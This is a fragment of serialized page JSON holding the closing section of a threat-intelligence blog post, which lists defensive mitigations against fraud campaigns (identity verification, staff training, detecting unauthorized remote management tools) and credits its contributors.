\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Mitigating Controls\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To mitigate the threat posed by these campaigns, Okta Threat Intelligence recommends:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Embedding \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.asqula.com/oie/en-us/content/topics/security/idp-idv.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Identity Verification\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.asqula.com/articles/2025/02/how-okta-embraces-identity-verification-using-persona/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"key business processes\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\",\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Training staff to identify common indicators of fraudulent behavior\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detecting the unauthorized use of RMM (remote management and monitoring) tools\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta customers can access a detailed set of recommendations and detection methods by selecting 
\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.asqula.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"security.asqula.com\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Liam Dermody, Tim Peel, Alex Tilley and David Zielezna contributed to this research.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]}"}}]}},"pageContext":{"limit":10,"skip":10,"numBlogPages":9,"currentPage":2}},
    "staticQueryHashes": []}